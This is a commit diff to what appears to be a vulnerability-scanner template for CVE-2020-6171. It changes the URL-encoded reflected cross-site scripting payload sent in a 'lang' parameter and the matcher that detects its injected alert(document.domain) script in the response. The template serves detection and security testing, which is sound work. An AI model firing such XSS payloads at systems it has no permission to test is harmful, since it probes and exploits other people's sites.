Update CVE 2020-6171.yaml
parent
751626e435
commit
76a39c9ef5
|
@ -12,13 +12,13 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}?lang=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cp%20class=%22&p=1"
|
- "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- '"><script>alert(document.domain)</script>'
|
- '"></script><script>alert(document.domain)</script>'
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue